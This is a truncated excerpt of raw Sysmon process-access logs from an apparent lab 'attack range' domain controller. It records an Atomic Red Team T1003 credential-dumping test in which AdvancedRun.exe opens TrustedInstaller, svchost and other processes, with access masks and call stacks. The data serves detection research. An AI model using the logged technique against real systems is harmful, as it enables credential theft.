17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003944032Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003944031Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003944030Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 534500x80000000000000003944029Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003944028Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944027Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003944026Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944025Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944024Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944023Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003944022Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944021Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944020Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944019Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944018Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944017Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944016Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003944015Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003944014Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.168{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1e